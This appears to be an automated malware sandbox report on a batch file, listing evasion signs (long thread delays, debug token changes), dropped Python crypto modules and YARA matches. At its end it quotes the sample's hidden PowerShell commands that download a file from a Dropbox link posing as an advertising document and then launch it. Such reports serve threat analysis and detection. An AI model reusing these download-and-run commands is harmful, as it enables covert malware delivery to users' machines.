            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC3132F3 str word ptr [eax-22h]15_2_00007FFAAC3132F3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4910Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4983Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4590Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3760Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4829Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4897Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4429Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5013Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 4910 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 4983 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 4590 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 3760 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep count: 4829 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep count: 4897 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2868Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 4429 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 5013 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 0000000D.00000002.1401370832.000001876A230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1600602765.0000023E72192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: amsi64_7988.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_2064.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7988, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
